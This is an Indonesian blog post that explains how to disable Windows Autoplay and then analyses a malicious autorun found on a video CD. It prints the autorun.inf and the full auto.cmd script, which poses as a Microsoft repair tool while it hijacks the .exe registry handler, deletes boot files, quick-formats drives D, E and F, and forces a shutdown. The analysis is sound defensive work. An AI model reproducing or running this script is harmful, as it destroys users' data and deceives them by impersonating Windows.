artikel di bawah ini untuk kepentingan edukasi, tidak ada maksud untuk mengajari membuat skrip yang berbahaya. segala sebab akibat yang timbul setelah membaca artikel di bawah ini bukan tanggung jawab penulis.
untuk menghindari virus, aku putuskan untuk mematikan autoplay semua device, cdrom dan usb mass storage ( flashdisk, memory card, mp3 player, portable harddisk pokoke semua yang nyimpen data pake USB deh)
cara mematikan autoplay :
jalankan Run (windows+R), ketik gpedit.msc, maka akan keluar Group Policy, cari User Configuration -> Administrative Templates -> System -> di jendela kanan cari Turn off Autoplay dan dobel klik disitu, maka munculah propertiesnya, klik enable, dibawahnya pilih all drive, klik OK. dijamin ga akan ada virus yang autorun dari flashdisk atau CDrom. konsekuensinya, setiap nancepin flashdisk atau masukin CD harus dilihat langsung ke my computer. ga akan muncul lagi menu autoplay.
skrip-nya
setelah autoplay tidak aktif, vcd yang menyebabkan hardisk ku terformat masukin lagi ke CDrom, setelah di browse ternyata memang ada 3 file dengan ekstensi yang tidak terlalu asing. auto.cmd, autorun.inf, shutdown.exe, mari kita bahas satu2.
autorun.inf adalah file yang dikenali windows untuk dijalankan lewat autoplay pada cd, atau media penyimpan lainnya, dan perintah yang dituliskan dalam file autorun.inf akan dijalankan. Pada vcd ini isi perintahnya adalah :[autorun]
open=Auto.cmd
icon=shutdown.exe,0
kira-kira perintah diatas artinya menyuruh windows lewat autoplay untuk menjalankan file auto.cmd
auto.cmd, ekstensi cmd dikenali winXP sebagai Windows NT Command Script berarti file ini akan dijalankan pada mode command prompt. isi file ini :
(cetak miring adalah penjelasan seadanya)@echo off
perintah ini berfungsi untuk menghilangkan prompt, jadi layar command prompt kosongtitle Microsoft Windows TM Auto Repair
mengganti title bar dengan tulisan diatas, seolah2 hal yang terjadi adalah dari windowsecho.
echo adalah perintah pada command prompt untuk menampilkan pesan yang ditulis setelah perintah 'echo' pemberian tanda titik untuk memberi space saja
echo Preparing to Fixing the System..............................
menampilkan tulisan setelah kata 'echo'echo This system need to repair of broken files.
echo This problem may be cause a Virus activity or coruption files.
echo Please wait a minute until windows doing it self....
echo Please close any running programs from the Windows system.
echo This program License and copyright by
echo Microsoft Coorporation TM.
echo System Repair in progress ........ please wait a second..
echo.
reg add HKLM\SOFTWARE\Classes\exefile\shell\open\Command /ve /d %%fe340ead%% /f
blum tau fungsinya, yang jelas dia menambah sejumlah perintah pada registri.echo.del /f /Q /A C:\ntldr /S
del untuk menghapus file, /f berarti menghapus file readonly juga, /Q tidak ada konfirmasi, /A file dengan atribut menurut /S yg berarti file system, C:\ntldr folder dan isinya yg akan dihapusecho.
Format D: /Q /X /y
perintah memformat drive D:, /Q quick format, /X ga ngerti juga, translate-nya susah hehehe., /y ga tau, ga ada di winXPecho.
Format E: /Q /X /y
echo.
Format F: /Q /X /y
echo.
del /f /Q /A C:\command.com /S
echo.
del /f /Q /A C:\io.sys /S
echo.
del /f /Q /A C:\config.sys /S
echo.
echo System is now repaired.
echo Windows will reboot the system.
echo.
Shutdown.exe -s -c "Finish Repair System" -f -t 10
memerintahkan shutdown.exe untuk mematikan PC dengan hitung mundur 10detik dengan memberikan pesan "Finish Repair System"echo.
pause
menghentikan proses sementara (padahal ga ada yang berjalan) dan mengeluarkan pesan "press any key to continue"echo.
Shutdown.exe -s -c "Finish Repair System" -f -t 10
kurang puas perintah shutdown nya di ulangecho.
exit
keluar dari mode command prompt
5 comments:
Post a Comment